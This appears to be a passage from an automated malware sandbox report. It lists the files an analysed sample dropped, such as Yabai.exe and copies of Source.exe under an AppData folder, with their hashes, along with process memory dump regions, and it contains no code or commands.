aeba815f609b84f96fb150f4d2d3a167

SHA1
c4fd5570edfb468943f8979fd91d84069ef32e89

SHA256
e2fab9539475ece8feeef0d2f313a8c7c600ea170c7e11d178bef335731add15

SHA512
fd919d502c7bd0568dfdbb7b281df1150803f73ccee185cea26ea2712262c8c8902c9b3adee45ae6366dde467e65d4dad41d4f162d5678bbfacb071c50b8f83c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
d5c0ad1a66d93334354457df64e94be5

SHA1
ce7658d83092c7c0cf610ff4118ce4dba750f2ad

SHA256
a1dde44c47fc1a297a684811197f996feb3539ccf3e7c5b4b3496dc39f5cb126

SHA512
d4746435c271d60055ecc7a9174a6a2c8c8e3ee51ac3f2769f0b736cbd9a0d2762cdd74c4b49322fed4ae8410243eecb9f225cb45f576ed7f778b27f293e9a3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
dad35cfa38ffc4be34be5cdf573672ee

SHA1
c94c409bdd2f30e30bd8ed516f7d509cc5859dea

SHA256
c2246f50303f08f109df8633d203ccf9c2746295df8fee7cc852f01ff516cdc0

SHA512
f667edc33346826957819b7e3776cd788675198d0a69c949e0220010a21a269b2ef0e0a85f0e433def15acbcb15a0b0058653126147187558cdbefb8832e31f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
45a668dc1600c430a76f0e03cc8dba46

SHA1
15918be84fd5d01810b988f5aa2bf33e6e90b943

SHA256
f4858002935eb70216bc42324488678485d82e0fab890dc09d72e1312597555c

SHA512
95e85dd243ced091fdd3133509719cdff864cccf96cb2c1d337565bf007ac9ffb32dc004e067677bfbf01f03ce400fda3cfa906e3d481d60f696f74a412ccfa4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
6da9c8f0a91adda9dc3938f6ac5303fd

SHA1
a5195a7ebf28b3521580b0496bc04b5ee96c904c

SHA256
e1786b7cacbd6f254efa8ccd9d762f46df879a08d22e9986ef59359899ab94d0

SHA512
54152db3392454a5320b0091294b867f6438873ba42028c813d8bddf5933684267249ccc1607ebe0eb608d92461cb952eb51341d20cd9e44f601e328e125d108

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
3c71bf249c14310733d0bb9330f4e1e2

SHA1
28276f9fb950f0ad4451b149ba3de4c662f9e67e

SHA256
b8f229b46c8f1a739f1697720b4da756e1ef0a1dd89ad06b45378fb4b3e87ec1

SHA512
e6984f60fb99bed2f60f6ffd4a1c2aeb07a03ae8bb4d896e64a41c2c3a1cb7b0bc063f6b826a4d6fab0baf4578ea54526b4f2f77b3605ab2956b7d33fc0a5908

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
57b0d5c069389b906398258e21e3f841

SHA1
c964c5027a735a641d60f11ee23e264fca153e6d

SHA256
7322aca18a236485ae9dc1b822dfed59a595f19215e9e58794c04a13ab098abb

SHA512
c9c06a2c33d9c324ae20480622e65443181d0ddab74871411e81e21e2a44ca548893b717dc98fbab4f42d6148254c9033d2bd8d99ab49c6ca048842922f5582e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
5b51cb77f6bb2742083b789238218525

SHA1
a717576d5499f008e603f78790b5680741be0aa1

SHA256
68454459e57599ba856e6a62ae1a60a2fe4365fa21642cda92998d54a179e792

SHA512
cafd2796a500b51759d9feda993c8a65b8d3b42976ea2e62c2fd23164d7d2e2b32ebc1332a89a947c6be8a3e989f80a0be2be760643da9cafd42458a42d40bd5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
16KB

MD5
831bc1111ffa1b007c5b7b101923bd27

SHA1
fe3b4db3909d4559dd035d69e4800a10498be08c

SHA256
9274590d96568beb2d27d3780e8859e730c59b0d686d4b140d3185a7c998cd2d

SHA512
2c34da6bf2e2a514ff4d232e113f36746565543e3a575b4f356ebc2b270b8ee8b868fdce606a413c41522407df5606cf8f61e6e37f355f04db3571c62e091b0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
ef4f57fe3d305dfc52f6ed2713f22ac8

SHA1
86265b0a3d754bda1cc7057df31c21ec4f0c656f

SHA256
82e90b99047c1c2832296920ee6e9b8b9b22ababdd587c73ff50d49ae08a5170

SHA512
7dd23564f75b1d112e210463f7cdecde53d8b5ec6a7d951d9232cdc9b4fd242950cd57bf044c3a06a5dd9cf2a4da4adb6fe1539f2180d3e5b5c89c069c7161a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
882136b64caff7b33f217a3d7c08ba22

SHA1
97653194474196d7e38f4ea7a510f2c15d579608

SHA256
ba3cd0396c28b83c7f3f075f92f8dac3278ac081680e5dec2f03ee37a380ff32

SHA512
3e70ebbd16b54bc1f8b808b8b81633d712b8fb945a13e8a9a0860c0bc8bc0bbc806a92d0d51246059dc2d38c12c4ff0133db52eee3ce6aac70684b1cf36846dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
6e9830418c14d7f5a8999b9f144f08d6

SHA1
9dfcf5604b0a9bc9229266654dfd581e4ce5acde

SHA256
5addc85f7237c3c2df84abc0559df00eac87cd240b069de9537cbbc0a9c169f9

SHA512
eb9fdeee3c33ae7d00be294b3b6df756096b65317cceabe019b7582f15312085106c7e28d103acd68cb09dc9e373375f020ae6be52c4bad7eb512e662b0068df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
15KB

MD5
b66e3555f93e8bff1b0ec9931ab4d769

SHA1
f148eef561fc0023627a54cfb2febe5c2b2e13d5

SHA256
514101e397372ae973eadb593d72c7988fc9d5f3708727e432b53d4be4addc31

SHA512
f96f3d0ab31fba9c9e3b154600313fbb003aa43f5db4ec03b31eb5ea31d46a49e39da5825511ac3099c29fff5cb631a7cedc1cfe844c1c11ed1942f54dd00b64

Download Submit
C:\Users\Admin\AppData\Local\Temp\Hyhueiwl.exe

Filesize
318KB

MD5
99213233a5aabe1f92db33fb4b842687

SHA1
8446743941868366f9012f28a48f91a193b1a1d9

SHA256
2f18b14a91e91f38dd2a24c8385189a4b8bc4f7cab10b13e4008cc8cf2c74e33

SHA512
057ec7058adc72584cf3d5a7acaf18aaaa927c5cc1e7091cb78edc5aa0d96b8ba081e029f349c343374a852239b331ed4906ac2a08b60043e3a1cfe5dcc0de6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Yabai.exe

Filesize
1.2MB

MD5
00d20d77a5f8af788f71c0b277f07928

SHA1
d0d0375a26821f6f9b0834fec7fa0a1d5bff0774

SHA256
8faff6a901ab4b718c2d1305d20a18e0a0fb662d49a9f497811f05bde80a4768

SHA512
e403e2a3e862229484278f859ee6b68fe25b5798a260e93ef8c8c6dab264c9923f47a5f38b1044d33f294031591df807ecc11e74f487143a935ca18c817b56aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sxlp4y2p.2ef.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe

Filesize
1.2MB

MD5
e25679c6f5e773ded8efb0bdd8e06667

SHA1
8d3aaa3c4c206e14bbf02c0fadff1f285426dcbd

SHA256
2c4abb5375ee533465446a03d1f81f45123815f6c600e63bc1d06c702e842240

SHA512
c69b90c07c1c9056204782166dc4d4cb201529cb297a3fa4dd0990a099850faea4986d880e3fd3347f08ec2fa99f462ca2d7656394af4a35effc7fd8f47f5714

Download Submit
C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe

Filesize
463KB

MD5
445d4a6ba3a79dc3be0b7be5d6421cb7

SHA1
67829bef89d96d4faf2679aef02ea513d0a34d0f

SHA256
aa79b54929c28d264cae567bee02ca3b9802440b2c798aff5840966258942ce5

SHA512
65b715776735bb48afc65f3998f1712d4607c2c803257bfb31594116620630c0af9937ee48005394cdcfbab49a53670ba5080cad8da54bdc4197b60b120ce7ed

Download Submit
C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe

Filesize
128KB

MD5
4c11641f4319e9b187e234fa7eaaebd7

SHA1
9ecf4b2713b5284351b87aab6c9f3cb75f544a82

SHA256
103cd4a227e017c2b1929aaf7beda6b06d9dd4c614bef12c5489b700304b63d5

SHA512
2b2a5698d108b75fb6e4b4f56499d10c7f6aa5dcd05cc79e451fd2b0cad4a15909950cc09cbec8dbefb21b0323bc7617f4b7def0603704c5aafb94672e552d5b

Download Submit
C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe

Filesize
1.3MB

MD5
fc1970b497075ee27039eebaca37c4b2

SHA1
f443d152d319c3d0934bf51ff21331f2a95af87c

SHA256
fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f

SHA512
3e9add4e211706a655e899d9a8163d3c67e49202ada75619708bca76d32d07dc36529ab151fca43aeef84a841e55a874b137c8d6945dd65472a872df6a36eb79

Download Submit
memory/652-176-0x000001AE70500000-0x000001AE70510000-memory.dmp

Filesize
64KB

Download
memory/652-179-0x00007FFB538A0000-0x00007FFB54362000-memory.dmp

Filesize
10.8MB

Download
memory/652-165-0x00007FFB538A0000-0x00007FFB54362000-memory.dmp

Filesize
10.8MB

Download
memory/652-166-0x000001AE70500000-0x000001AE70510000-memory.dmp

Filesize
64KB

Download
memory/652-175-0x000001AE70500000-0x000001AE70510000-memory.dmp

Filesize
64KB

Download
memory/1120-5-0x0000017AEBD70000-0x0000017AEBE5C000-memory.dmp

Filesize
944KB

Download
memory/1120-2-0x00007FFB552A0000-0x00007FFB55D62000-memory.dmp

Filesize
10.8MB

Download
memory/1120-4-0x0000017AEB4C0000-0x0000017AEB5AC000-memory.dmp

Filesize
944KB

Download
memory/1120-21-0x00007FFB552A0000-0x00007FFB55D62000-memory.dmp

Filesize
10.8MB

Download
memory/1120-0-0x0000017AE94C0000-0x0000017AE9614000-memory.dmp

Filesize
1.3MB

Download
memory/1120-6-0x0000017AEB5F0000-0x0000017AEB63C000-memory.dmp

Filesize
304KB

Download
memory/1120-3-0x0000017AEBF60000-0x0000017AEBF70000-memory.dmp

Filesize
64KB

Download
memory/1120-1-0x0000017AEB380000-0x0000017AEB486000-memory.dmp

Filesize
1.0MB

Download
memory/1372-181-0x00000218AAB30000-0x00000218AAB40000-memory.dmp

Filesize
64KB

Download
memory/1372-178-0x00007FFB538A0000-0x00007FFB54362000-memory.dmp

Filesize
10.8MB

Download
memory/1372-187-0x00007FFB538A0000-0x00007FFB54362000-memory.dmp

Filesize
10.8MB

Download
memory/1440-217-0x000001354B2B0000-0x000001354B378000-memory.dmp

Filesize
800KB

Download
memory/1440-239-0x00007FFB538A0000-0x00007FFB54362000-memory.dmp

Filesize
10.8MB

Download
memory/1440-215-0x000001354B190000-0x000001354B270000-memory.dmp

Filesize
896KB

Download
memory/1440-213-0x0000013530B50000-0x0000013530C80000-memory.dmp

Filesize
1.2MB

Download
memory/1440-221-0x000001354B2A0000-0x000001354B2B0000-memory.dmp

Filesize
64KB

Download
memory/1440-219-0x000001354B380000-0x000001354B448000-memory.dmp

Filesize
800KB

Download
memory/1440-216-0x00007FFB538A0000-0x00007FFB54362000-memory.dmp

Filesize
10.8MB

Download
memory/3396-25-0x0000000000280000-0x00000000002D6000-memory.dmp

Filesize
344KB

Download
memory/3396-43-0x0000000005810000-0x00000000059D2000-memory.dmp

Filesize
1.8MB

Download
memory/3396-34-0x0000000005460000-0x000000000563A000-memory.dmp

Filesize
1.9MB

Download
memory/3396-27-0x0000000004BB0000-0x0000000004BC0000-memory.dmp

Filesize
64KB

Download
memory/3396-26-0x0000000074700000-0x0000000074EB1000-memory.dmp

Filesize
7.7MB

Download
memory/3396-227-0x0000000074700000-0x0000000074EB1000-memory.dmp

Filesize
7.7MB

Download
memory/3396-49-0x00000000059F0000-0x0000000005BB0000-memory.dmp

Filesize
1.8MB

Download
memory/3396-214-0x0000000007980000-0x0000000007F26000-memory.dmp

Filesize
5.6MB

Download
memory/3396-124-0x0000000004BB0000-0x0000000004BC0000-memory.dmp

Filesize
64KB

Download
memory/3396-108-0x0000000074700000-0x0000000074EB1000-memory.dmp

Filesize
7.7MB

Download
memory/4132-168-0x00007FFB538A0000-0x00007FFB54362000-memory.dmp

Filesize
10.8MB

Download
memory/4132-162-0x00000249C14A0000-0x00000249C14B0000-memory.dmp

Filesize
64KB

Download
memory/4132-161-0x00007FFB538A0000-0x00007FFB54362000-memory.dmp

Filesize
10.8MB

Download
memory/4312-79-0x00007FFB552A0000-0x00007FFB55D62000-memory.dmp

Filesize
10.8MB

Download
memory/4312-102-0x00007FFB552A0000-0x00007FFB55D62000-memory.dmp

Filesize
10.8MB

Download
memory/4312-18-0x0000000000400000-0x00000000004B2000-memory.dmp

Filesize
712KB

Download
memory/4312-22-0x00007FFB552A0000-0x00007FFB55D62000-memory.dmp

Filesize
10.8MB

Download
memory/4312-24-0x00000190ED230000-0x00000190ED240000-memory.dmp

Filesize
64KB

Download
memory/4312-23-0x00000190EDA30000-0x00000190EDB30000-memory.dmp

Filesize
1024KB

Download
memory/4312-28-0x00000190EB880000-0x00000190EB888000-memory.dmp

Filesize
32KB

Download
memory/4312-29-0x00000190ED0C0000-0x00000190ED116000-memory.dmp

Filesize
344KB

Download
memory/4312-30-0x00000190ED1A0000-0x00000190ED1F4000-memory.dmp

Filesize
336KB

Download
memory/4312-91-0x00000190ED230000-0x00000190ED240000-memory.dmp

Filesize
64KB

Download
memory/5196-182-0x00007FFB538A0000-0x00007FFB54362000-memory.dmp

Filesize
10.8MB

Download
memory/5196-362-0x000001315E680000-0x000001315E690000-memory.dmp

Filesize
64KB

Download
memory/5196-927-0x00007FFB538A0000-0x00007FFB54362000-memory.dmp

Filesize
10.8MB

Download
memory/5196-183-0x000001315E680000-0x000001315E690000-memory.dmp

Filesize
64KB

Download
memory/5196-930-0x000001315E680000-0x000001315E690000-memory.dmp

Filesize
64KB

Download
memory/5436-106-0x00007FFB552A0000-0x00007FFB55D62000-memory.dmp

Filesize
10.8MB

Download
memory/5436-66-0x00007FFB552A0000-0x00007FFB55D62000-memory.dmp

Filesize
10.8MB

Download
memory/5436-67-0x00000254C64D0000-0x00000254C64E0000-memory.dmp

Filesize
64KB

Download
memory/5436-68-0x00000254C64D0000-0x00000254C64E0000-memory.dmp

Filesize
64KB

Download
memory/5436-77-0x00000254ADF30000-0x00000254ADF52000-memory.dmp

Filesize
136KB

Download
memory/5436-78-0x00000254C64D0000-0x00000254C64E0000-memory.dmp

Filesize
64KB

Download
memory/5436-80-0x00000254C64D0000-0x00000254C64E0000-memory.dmp

Filesize
64KB

Download
memory/5436-105-0x00000254C62F0000-0x00000254C643F000-memory.dmp

Filesize
1.3MB

Download
memory/5640-263-0x00000252AC990000-0x00000252ACA6F000-memory.dmp

Filesize
892KB

Download
memory/5640-241-0x00000252AC990000-0x00000252ACA6F000-memory.dmp

Filesize
892KB

Download
memory/5640-267-0x00000252AC990000-0x00000252ACA6F000-memory.dmp

Filesize
892KB

Download
memory/5640-229-0x0000000000400000-0x00000000004AA000-memory.dmp

Filesize
680KB

Download
memory/5640-247-0x00000252AC990000-0x00000252ACA6F000-memory.dmp

Filesize
892KB

Download
memory/5640-255-0x00000252AC990000-0x00000252ACA6F000-memory.dmp

Filesize
892KB

Download
memory/5640-232-0x00000252AC990000-0x00000252ACA74000-memory.dmp

Filesize
912KB

Download
memory/5640-236-0x00007FFB538A0000-0x00007FFB54362000-memory.dmp

Filesize
10.8MB

Download
memory/5640-271-0x00000252AC990000-0x00000252ACA6F000-memory.dmp

Filesize
892KB

Download
memory/5640-238-0x00000252ACAD0000-0x00000252ACAE0000-memory.dmp

Filesize
64KB

Download
memory/5640-275-0x00000252AC990000-0x00000252ACA6F000-memory.dmp

Filesize
892KB

Download
memory/5640-242-0x00000252AC990000-0x00000252ACA6F000-memory.dmp

Filesize
892KB

Download
memory/5640-279-0x00000252AC990000-0x00000252ACA6F000-memory.dmp

Filesize
892KB

Download
memory/5640-251-0x00000252AC990000-0x00000252ACA6F000-memory.dmp

Filesize
892KB

Download
memory/5640-283-0x00000252AC990000-0x00000252ACA6F000-memory.dmp

Filesize
892KB

Download
memory/5640-291-0x00000252AC990000-0x00000252ACA6F000-memory.dmp

Filesize
892KB

Download
memory/5640-287-0x00000252AC990000-0x00000252ACA6F000-memory.dmp

Filesize
892KB

Download
memory/5640-259-0x00000252AC990000-0x00000252ACA6F000-memory.dmp

Filesize
892KB

Download
memory/5772-248-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-228-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-245-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-288-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-280-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-285-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-1929-0x0000000002BE0000-0x0000000002BE1000-memory.dmp

Filesize
4KB

Download
memory/5772-276-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-240-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-272-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-230-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-268-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-252-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-256-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-260-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-235-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-264-0x0000000005260000-0x000000000531D000-memory.dmp

Filesize
756KB

Download
memory/5772-226-0x0000000005250000-0x0000000005260000-memory.dmp

Filesize
64KB

Download
memory/5772-225-0x0000000074700000-0x0000000074EB1000-memory.dmp

Filesize
7.7MB

Download
memory/5772-224-0x0000000005260000-0x0000000005322000-memory.dmp

Filesize
776KB

Download
memory/5772-220-0x0000000000400000-0x00000000004B6000-memory.dmp

Filesize
728KB

Download